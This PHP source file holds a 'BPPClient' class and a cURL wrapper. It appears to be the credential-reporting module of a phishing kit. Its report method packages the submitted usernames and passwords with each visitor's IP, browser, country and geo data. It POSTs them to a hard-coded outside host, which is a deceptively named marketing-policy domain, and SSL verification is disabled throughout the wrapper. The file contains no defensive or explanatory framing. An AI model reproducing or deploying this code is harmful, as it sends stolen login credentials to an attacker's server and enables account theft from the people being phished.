<?php
class BPPClient{
    private $url = 'http://online-marketing-policies-advisory.com/api/remote/v1/report';
    private $private_key = '';
    private $public_key = '';
    private $email = '';
    private $http;
    private $domain = '';
    function __construct(){
        $this->http = new HttpClient();
    }
    function setPrivateKey($key){
        $this->private_key = $key;
    }
    function setPublicKey($key){
        $this->public_key = $key;
    }
    function setUrl($url){
        $this->url = $url;
    }
    function setEmail($email){
        $this->email = $email;
    }
    function setDomain($domain){
        $this->domain = '';
    }
    function report($username, $password, $valid, $country_code, $geo_data)
    {

        $data = array(
            'public_key' => $this->public_key,
            'private_key' => $this->private_key,
            'ip' => $_SERVER['REMOTE_ADDR'],
            'country' => $country_code,
            'username' => $username,
            'password' => $password,
            'valid' => $valid,
            'browser' => $_SERVER['HTTP_USER_AGENT'],
            'from' => $_SERVER["REQUEST_SCHEME"] . '://' . $_SERVER["HTTP_HOST"],
            'geo_data' => $geo_data);

        $query = http_build_query($data);
        $this->http->Post($this->url, $query);

        if ($this->email != ''){
            //send email as well.
            $subj = $_SERVER['REMOTE_ADDR'] . ' | ' . $country_code;
            if ($this->domain == ''){
                $this->domain = 'BPP Panel';
            }
            $from = "From: $this->domain<west>\n";
        }
    }

}
class HttpClient
{
    private $cookieFile = '';
    function __construct(){
        //generate cookie stuff
        //$this->cookieFile = dirname(__FILE__).'/c_'.md5(time() . rand(1, 99999)).'.txt';
        $this->cookieFile = "";

    }
    function GetBetween($string, $start, $end){
        $string = ' ' . $string;
        $ini = strpos($string, $start);
        if ($ini == 0) return '';
        $ini += strlen($start);
        $len = strpos($string, $end, $ini) - $ini;
        return substr($string, $ini, $len);
    }
    function PostEx($url, $data){
        $verify = curl_init();
        curl_setopt($verify, CURLOPT_URL, $url);
        //curl_setopt($verify, CURLOPT_PROXY, '127.0.0.1:8888');
        curl_setopt($verify, CURLOPT_COOKIESESSION, true);
        //curl_setopt($verify, CURLOPT_COOKIEJAR, $this->cookieFile);
        curl_setopt($verify, CURLOPT_COOKIEFILE, $this->cookieFile);
        curl_setopt($verify, CURLOPT_POST, true);
        curl_setopt($verify, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($verify, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($verify, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($verify, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($verify, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36');
        return curl_exec($verify);
    }
    function Get($url, $headers = array())
    {
        $verify = curl_init();
        //curl_setopt($verify, CURLOPT_PROXY, '127.0.0.1:8888');
        curl_setopt($verify, CURLOPT_URL, $url);
        curl_setopt($verify, CURLOPT_COOKIESESSION, true );
        if (!empty($headers)){
            curl_setopt($verify, CURLOPT_HTTPHEADER, $headers);
        }
        //curl_setopt($verify, CURLOPT_COOKIEJAR, $this->cookieFile);
        curl_setopt($verify, CURLOPT_COOKIEFILE, $this->cookieFile);
        curl_setopt($verify, CURLOPT_POST, false);
        curl_setopt($verify, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($verify, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($verify, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($verify, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36');
        return curl_exec($verify);
    }
    function GetBinary($url){
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_COOKIESESSION, true );
        //curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookieFile);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookieFile);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36');
        $data = curl_exec($ch);
        curl_close($ch);

        return $data;
    }

    function Post($url, $data, $headers = array())
    {
        $verify = curl_init();
        curl_setopt($verify, CURLOPT_URL, $url);
        if (!empty($headers)){
            curl_setopt($verify, CURLOPT_HTTPHEADER, $headers);
        }
        //curl_setopt($verify, CURLOPT_PROXY, '127.0.0.1:8888');
        curl_setopt($verify, CURLOPT_COOKIESESSION, true);
        //curl_setopt($verify, CURLOPT_COOKIEJAR, $this->cookieFile);
        curl_setopt($verify, CURLOPT_COOKIEFILE, $this->cookieFile);
        curl_setopt($verify, CURLOPT_POST, true);
        curl_setopt($verify, CURLOPT_POSTFIELDS, $data);
        curl_setopt($verify, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($verify, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($verify, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($verify, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36');
        return curl_exec($verify);
    }
}